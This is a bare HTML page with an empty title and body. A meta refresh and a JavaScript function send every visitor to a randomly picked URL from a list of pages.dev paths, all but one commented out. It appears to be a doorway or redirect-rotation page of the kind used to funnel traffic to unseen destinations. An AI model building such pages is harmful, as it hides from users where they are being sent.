o<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>.</title>
    <!-- Meta refresh to provide a fallback in case JavaScript is disabled -->
    <meta http-equiv="refresh" content="2;url=https://jujump3.pages.dev/kego">
    <script type="text/javascript">
        // Array of URLs to redirect to kepx.html
        var urls = [
          //  'https://jujump3.pages.dev/kesa',
            'https://jujump3.pages.dev/kego'
           // 'https://jujump3.pages.dev/kepx',
            //'https://jujump3.pages.dev/kefu',
           // 'https://jujump3.pages.dev/keho',
           // 'https://jujump3.pages.dev/keti',
           // 'https://jujump3.pages.dev/kepa',
            //'https://jujump3.pages.dev/kepi',
           // 'https://jujump3.pages.dev/kejo',
          //  'https://jujump3.pages.dev/keyo',
          //  'https://jujump3.pages.dev/kemi',
           // 'https://jujump3.pages.dev/kiki',
           // 'https://jujump3.pages.dev/kamu'
        ];

        // Function to redirect to a random URL
        function randomRedirect() {
            var randomIndex = Math.floor(Math.random() * urls.length);
            window.location.href = urls[randomIndex];
        }

        // Call the function immediately upon script execution
        randomRedirect();
    </script>
</head>
<body>
    <p>.</p>
</body>
</html>
